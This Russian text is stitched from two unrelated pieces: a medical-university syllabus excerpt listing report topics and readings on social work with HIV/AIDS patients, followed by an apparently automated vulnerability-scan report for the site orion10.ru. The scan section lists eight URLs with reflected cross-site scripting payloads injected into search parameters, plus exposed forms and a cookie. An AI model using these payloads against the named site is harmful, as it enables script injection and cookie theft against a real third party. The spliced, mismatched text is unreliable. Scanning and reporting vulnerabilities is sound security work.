Возможные последствия(каждый студент в течении цикла в обязательном порядке готовит реферативный доклад): 1.Технологии социально-медицинской работы с ВИЧ-инфицированными и больными СПИДом 2.Социально-медицинские проблемы ВИЧ-инфицированных и больных СПИДом 3.Нормативно-правовая база социально-медицинской работы с ВИЧ-инфицированными и больными СПИДом 4.Профилактическая медико-социальная работа с молодёжью 5. Социальная работа с ВИЧ-инфицированными несовершеннолетними 6.Социальный контроль за ВИЧ-инфицированными людьми 7.Дети и семьи ВИЧ- инфицированных.Психологические аспекты 8.Виды психосоциальной помощи при работе с ВИЧ-инфицированными 9.Эпидемиология и профилактика ВИЧ-инфекции 10.Этические и юридические проблемы СПИДА 8. Рекомендованная литература по теме занятия: 1.Артюнина Г.П. Основы социальной медицины: Учебное пособие для вузов. М.: Академический проект, 2009. - 576 с. 2.Социальная политика: Учебник / Под общ. ред. Н.А.Волгина. - М.: Издательство "Экзамен", 2009 год. - 736 с 3.Тен. Е.Е. Основы социальной медицины: Учебное пособие. - М. ФОРУМ: ИНФРА-М, 2007. - 256 с. 4.Технологии социальной работы: Учебник / Под общ.ред. проф.Е.И. Холостовой. - М.: ИНФРА-М, 2009. - 400с. С.121-144. 5.Холостова Е.И., Дементьева Н.Ф. Социальная реабилитация: Учебное пособие. 2-е изд. - М.: Издательско-торговая корпорация "Дашков и К°", 2008 - 340 с. Электронные ресурсы: 1. ЭБС КрасГМУ "Colibris"; 2. ЭБС Консультант студента; 3. ЭБС Университетская библиотека Online; 4. ЭНБ eLibrary
Возможные последствия Злоумышленники могут внедрять JavaScript, VBScript, ActiveX, HTML код в уязвимое приложение, получать данные пользователей. Например, злоумышленник может похитить cookies (куки). Кроме того, возможно изменять содержимое страницы, представленное пользователю.
URL Уязвимостей 1. http://orion10.ru/index.php?page=2&action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=3&pricelt=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000E3C)%3C/script%3E&str_search=3&vendor=3 2. http://orion10.ru/index.php?action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=3&pricelt=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000CA6)%3C/script%3E&str_search=3&vendor=3 3. http://orion10.ru/?page=2&action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x0008B1)%3C%2Fscript%3E&pricelt=3&str_search=3&vendor=3 4. http://orion10.ru/?action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=3&pricelt=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00061A)%3C/script%3E&str_search=3&vendor=3 5. http://orion10.ru/index.php?action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000C9F)%3C/script%3E&pricelt=3&str_search=3&vendor=3 6. http://orion10.ru/request_search.php 7. http://orion10.ru/?action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000616)%3C/script%3E&pricelt=3&str_search=3&vendor=3 8. http://orion10.ru/index.php?page=2&action=search&articul=3&groupID=3&onpage=10&order=price&pricegt=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000E3B)%3C/script%3E&pricelt=3&str_search=3&vendor=3
Для защиты от данного типа атак необходимо тщательно фильтровать входные параметры. --------------------------------------------------------------------------------------------------------------------------
Опасность утечки информации
Доступна информация Список форм Описание Обнаружены формы (POST запрос), использующиеся для передачи данных на сервер. В переменных HIDDEN может храниться специфическая или чувствительная информация. Переменные PASSWORD служат для ввода пароля. Список форм: POST / HTTP/1.1 POST /page.php?faq HTTP/1.1 POST /catalog.php?groupID=57 HTTP/1.1 POST /service.php HTTP/1.1 POST /?page=viewClientItems&orderID= HTTP/1.1
Доступна информация Список cookie Описание 1. cookie_test=please_accept_cookie; expires=Thu, 13-Feb-2014 14:00:32 GMT; path=/; domain=orion10.ru
Доступна информация Версии протоколов Описание Версии поддерживаемых протоколов:
|
